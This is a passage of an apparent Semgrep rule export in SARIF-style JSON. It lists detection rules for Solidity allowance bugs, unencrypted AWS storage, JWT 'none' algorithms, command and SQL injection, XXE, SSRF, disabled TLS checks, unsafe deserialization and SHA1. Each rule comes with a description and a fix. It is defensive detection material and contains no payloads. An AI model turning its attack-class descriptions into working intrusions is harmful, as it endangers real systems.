[Semgrep Rule](https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug)\n - [https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5](https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5)\n - [https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C](https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C)\n","text":"transferFrom() can steal allowance of other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","id":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","name":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","id":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","name":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","id":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","name":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"help":{"markdown":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec)\n - [https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec](https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec)\n - [https://docs.python.org/3/library/shlex.html](https://docs.python.org/3/library/shlex.html)\n","text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","id":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","name":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"help":{"markdown":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n","text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","id":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","name":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","id":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","name":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request)\n - [https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html](https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html)\n","text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","id":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","name":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"help":{"markdown":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n","text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","id":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","name":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli)\n - [https://pypi.org/project/pymssql/](https://pypi.org/project/pymssql/)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli","id":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","name":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.pymssql-sqli.pymssql-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host","id":"python.django.security.injection.tainted-url-host.tainted-url-host","name":"python.django.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"help":{"markdown":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","id":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","name":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.detailed-exceptions.detailed-exceptions"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","id":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","name":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"help":{"markdown":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle)\n - [https://github.com/jsonpickle/jsonpickle#jsonpickle](https://github.com/jsonpickle/jsonpickle#jsonpickle)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","id":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","name":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","id":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","name":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. 